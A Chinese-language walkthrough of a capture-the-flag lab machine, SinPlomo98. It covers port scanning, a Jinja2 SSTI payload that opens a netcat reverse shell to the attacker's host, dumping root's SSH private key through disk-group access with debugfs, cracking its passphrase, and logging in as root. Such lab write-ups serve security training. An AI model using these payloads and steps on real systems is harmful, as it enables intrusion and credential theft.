SinPlomo98

image

信息搜集

192.168.43.153

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
┌──(root㉿Eecho)-[~]
└─# rustscan -a 192.168.43.153 -- -A
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Scanning ports faster than you can say 'SYN ACK'

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 10140'.
Open 192.168.43.153:21
Open 192.168.43.153:22
Open 192.168.43.153:80
Open 192.168.43.153:5000
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -A" on ip 192.168.43.153
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.99 ( https://nmap.org ) at 2026-05-19 17:57 +0800
NSE: Loaded 158 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 17:57
Completed NSE at 17:57, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 17:57
Completed NSE at 17:57, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 17:57
Completed NSE at 17:57, 0.00s elapsed
Initiating ARP Ping Scan at 17:57
Scanning 192.168.43.153 [1 port]
Completed ARP Ping Scan at 17:57, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 17:57
Completed Parallel DNS resolution of 1 host. at 17:57, 0.50s elapsed
DNS resolution of 1 IPs took 0.50s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 17:57
Scanning 192.168.43.153 [4 ports]
Discovered open port 21/tcp on 192.168.43.153
Discovered open port 80/tcp on 192.168.43.153
Discovered open port 22/tcp on 192.168.43.153
Discovered open port 5000/tcp on 192.168.43.153
Completed SYN Stealth Scan at 17:57, 0.02s elapsed (4 total ports)
Initiating Service scan at 17:57
Scanning 4 services on 192.168.43.153
Completed Service scan at 17:57, 9.04s elapsed (4 services on 1 host)
Initiating OS detection (try #1) against 192.168.43.153
NSE: Script scanning 192.168.43.153.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 17:57
NSE: [ftp-bounce 192.168.43.153:21] PORT response: 500 Illegal PORT command.
Completed NSE at 17:57, 0.76s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 17:57
Completed NSE at 17:57, 0.05s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 17:57
Completed NSE at 17:57, 0.00s elapsed
Nmap scan report for 192.168.43.153
Host is up, received arp-response (0.00056s latency).
Scanned at 2026-05-19 17:57:36 CST for 11s

PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 64 vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 34 May 16 2024 supermegaultraimportantebro.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.43.6
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh syn-ack ttl 64 OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey:
| 256 f4:f1:61:c9:94:fe:27:41:8c:63:56:28:06:a1:12:5f (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLqYL0A7s/EiT1tlSYbcHhL7BYsOGU4UgsB/r0Aa5CZ949xc1i0acamGMX1DyYb6bdwd3x2q1QH9zkVNz2EbxKY=
| 256 3c:13:58:8b:6b:5a:16:0b:69:aa:1e:3a:40:57:21:91 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIP08fAAhbLYepoD1DMBsKCHA62C4/264QtA9t1Ms69TO
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.59 ((Debian))
|_http-server-header: Apache/2.4.59 (Debian)
|_http-title: Knight Bootstrap Template - Index
| http-methods:
|_ Supported Methods: OPTIONS HEAD GET POST
|_http-favicon: Unknown favicon MD5: FED84E16B6CCFE88EE7FFAAE5DFEFD34
5000/tcp open http syn-ack ttl 64 Werkzeug httpd 3.0.3 (Python 3.11.2)
|_http-server-header: Werkzeug/3.0.3 Python/3.11.2
| http-methods:
|_ Supported Methods: OPTIONS GET HEAD
|_http-title: \xC2\xA1Mi P\xC3\xA1gina Web!
MAC Address: 08:00:27:2A:69:61 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
TCP/IP fingerprint:
OS:SCAN(V=7.99%E=4%D=5/19%OT=21%CT=%CU=42486%PV=Y%DS=1%DC=D%G=N%M=080027%TM
OS:=6A0C341B%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=110%TI=Z%CI=Z%II=I%
OS:TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5
OS:=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=
OS:FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%
OS:A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0
OS:%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S
OS:=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R
OS:=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N
OS:%T=40%CD=S)

Uptime guess: 49.437 days (since Tue Mar 31 07:28:56 2026)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.56 ms 192.168.43.153

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 17:57
Completed NSE at 17:57, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 17:57
Completed NSE at 17:57, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 17:57
Completed NSE at 17:57, 0.00s elapsed
Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.95 seconds
Raw packets sent: 27 (1.982KB) | Rcvd: 19 (1.454KB)
  • 21 FTP
  • 22 SSH
  • 80 HTTP
  • 5000 HTTP

rce

访问5000端口查看源码发现了/petrolhead

image

访问/petrolhead

image

查看wappalyzer可以知道使用了flask搭建的,所以首先怀疑是ssti漏洞

image

输入45返回了45证实了ssti

image

image

反弹shell

1
{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('busybox nc 192.168.43.6 7777 -e sh').read() }}{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('busybox nc 192.168.43.6 7777 -e sh').read() }}

image

提权

tcuser -> root

1
2
tcuser@SinPLomo98:~$ id
uid=1000(tcuser) gid=1000(tcuser) grupos=1000(tcuser),6(disk),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),100(users),106(netdev)

核心漏洞点:当前用户 tcuser 属于 6(disk) 组

漏洞原理分析 (Vulnerability Analysis)

在 Linux 安全模型中,disk 组是一个权限极高的特殊组。该组的用户对系统内的所有块设备(Block Devices,如硬盘、分区等)拥有直接的读写(RW)权限。 常规情况下,普通用户无法访问 /etc/shadow 或 /root 等目录,是因为操作系统在上层文件系统(如 ext4)中施加了权限控制。然而,一旦用户属于 disk 组,就可以绕过上层文件系统的主体访问控制,直接在底层对块设备(硬盘物理轨道数据)进行读取或写入。这意味着攻击者可以物理式地提取敏感数据,或者强行重写系统关键文件。

挂载点枚举

1
2
3
4
5
6
7
tcuser@SinPLomo98:~$ df -h
S.ficheros Tamaño Usados Disp Uso% Montado en
udev 962M 0 962M 0% /dev
tmpfs 197M 528K 197M 1% /run
/dev/sda1 19G 2,3G 16G 13% /
tmpfs 984M 0 984M 0% /dev/shm
tmpfs 5,0M 0 5,0M 0% /run/lock

根分区 / 挂载在 /dev/sda1。由于 tcuser 在 disk 组中,因此对 /dev/sda1 具有完全控制权。

利用 debugfs 提取敏感凭据

debugfs 是一个用于调试 ext2/ext3/ext4 文件系统的工具。当普通用户拥有磁盘组权限时,可以使用它来无视权限复制文件

1
2
3
4
tcuser@SinPLomo98:~$ debugfs /dev/sda1
debugfs 1.47.0 (5-Feb-2023)
debugfs: dump /root/.ssh/id_rsa /tmp/id_rsa
debugfs: quit

这里私钥存在passphrase包含需要爆破密码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
┌──(root㉿Eecho)-[/tmp/bbbb]
└─# vim id_rsa
┌──(root㉿Eecho)-[/tmp/bbbb]
└─# chmod 600 id_rsa
┌──(root㉿Eecho)-[/tmp/bbbb]
└─# ssh2john id_rsa > rsa_hash.txt
┌──(root㉿Eecho)-[/tmp/bbbb]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt rsa_hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 24 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
angels1 (id_rsa)
1g 0:00:00:10 DONE (2026-05-19 18:17) 0.09107g/s 262.2p/s 262.2c/s 262.2C/s my3kids..soccer9
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

切换到root

1
2
3
4
5
6
7
8
9
10
11
12
13
14
tcuser@SinPLomo98:~$ ssh root@127.0.0.1 -i /tmp/id_rsa
Enter passphrase for key '/tmp/id_rsa':
Linux SinPLomo98 6.1.0-21-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.90-1 (2024-05-03) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu May 16 16:49:15 2024 from 192.168.0.108
root@SinPLomo98:~# id
uid=0(root) gid=0(root) grupos=0(root)
root@SinPLomo98:~#